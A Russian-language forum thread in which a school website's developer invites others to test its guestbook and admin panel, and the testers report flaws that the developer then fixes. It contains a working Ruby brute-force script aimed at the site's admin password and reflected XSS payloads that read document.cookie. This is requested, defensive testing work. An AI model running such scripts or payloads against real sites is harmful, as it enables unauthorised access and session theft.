Я сейчас разрабатываю сайт школы МОУСОШ п.Мичуринский.
Временный домен: http://schoolmich.edu.ru.orange.intobservatory.ru/
Работает на самописном движке (если это можно назвать движком).
Прошу проверить сайт на уязвимости.
Интересующие области: гостевая, админ-панель (http://schoolmich.edu.ru.orange.intobservatory.ru/admin/).

Спасибо! :)

Проверка все еще идет так что по пути буду редактировать сообщение.

1. в гостевой книге в поле текст сообщения можно вставлять html код

1.почему в админке не надо вводить логин - сразу минус
2.почему в админке пароль вводиться формой с методом GET - гигантский минус
какой-нить тип пробуртфорсит пароль и выложит где-нить ссылку и гугл проиндексирует админку, а может гугл и сам сможет подобрать пароль
3.почему нет ограничений на кол-ва ввода пароля, хотя бы какую-нить куку с попытками вводил или поля с рандомными именами.

и как следствие всего вышеупомянутого, многопоточный брутфорс под твою админку выглядит как HelloWorld!:
#!/usr/bin/ruby
require 'net/http'
th_count=50
for i in 0..100000 do
while Thread.list.size>th_count do sleep(1) end
Thread.new do
http=Net::HTTP.new('schoolmich.edu.ru.orange.intob servatory.ru', 80)
pass=i.to_s(36)
path="/admin/admin.php?password=#{pass}&doGo=%C2%EE%E9%F2%E8"
resp, data = http.get(path)
if !(data.include?("<body bgcolor=\"red\">"))
puts "#{pass} SUCCESS"
exit
end
puts "#{pass} FAILED"
end
end

прошел по такой ссылке
http://schoolmich.edu.ru.orange.intobservatory.ru/guest/showtopic.php?topic=430000000
заполнил форму и увидел это:
http://i6.fastpic.ru/thumb/2010/0402/a5/da722483b901f2cb4c2e447218fd94a5.jpeg (http://fastpic.ru/view/6/2010/0402/da722483b901f2cb4c2e447218fd94a5.png.html)

у тебя в самом коде страницы гостевой зашит ответ на капчу


...
document.add.text.value = b;
}

</script>

<form name="add" action='add.php?topic=100&test=43' method=post>
<table border=2 width=627 height=441 bgcolor=#9CBB8A>
<tr>
...

капча была: Выполните действие: 24 + 19

Ссори, что не ответил сразу. Был немного занят.
Итак:
1. Убрал всякие iframe, img и прочую ересь из поля text.
2. Страницу, с несуществующей темой вы больше не увидите.
3. В скрипте, отвечающем за добавление поста вы тоже больше не увидите раскрытия путей.
4. Над капчей поработал. Придётся посчитать немного, прежде чем её вытащить. ;) Думаю куки ставить бесполезно, всё равно прочитаете.
5. Над админкой сейчас работаю.

http://schoolmich.edu.ru.orange.intobservatory.ru/guest/showtopic.php?topic=1
Не очень хорошо для гостевой.

Угу. Согласен. Лиса отвалилась мгновенно.

Исправлено! Макс длинна сообщения 3072 символа. Спасибо.

= = = = = = = =

Так, сейчас убрал абсолютно все html-теги из поста. Пытаться писать [] в надежде, что их заменит на <> бесполезно. :D
Длинна сообщения урезана в 2 раза, то есть теперь 1536 символов.
Писать можно только через 0,5-1 минуту, после предыдущего поста.

Сейчас ушёл делать так, что бы нельзя было оставить более 2-х постов подряд с одного айпишника.

PS, насчёт админки... Чо ещё посоветуете сделать? Сейчас сделал: логин добавил, гет убрал, проверка админа по переменной в гете и по кукам так и осталась. Везде отключены сообщения об ошибках. Как бороться с брутом - не знаю. Остаётся только ставить пароль, который вы будете долго брутить... Хотя, он и сейчас такой. :d

http://schoolmich.edu.ru.orange.intobservatory.ru/guest/add.php?topic='%3C/script%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E Пассивка

http://schoolmich.edu.ru.orange.intobservatory.ru/guest/add.php?topic='%3C/script%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E Пассивка

Спасибо. Исправлено.

Гостевая. В поле "Сайт" пишм http://ya.ru onmouseover=alert(document.cookie) и получаем кукисы:-)

Гостевая. В поле "Сайт" пишм http://ya.ru onmouseover=alert(document.cookie) и получаем кукисы:-)

Вроде исправил. Со второго раза. ;)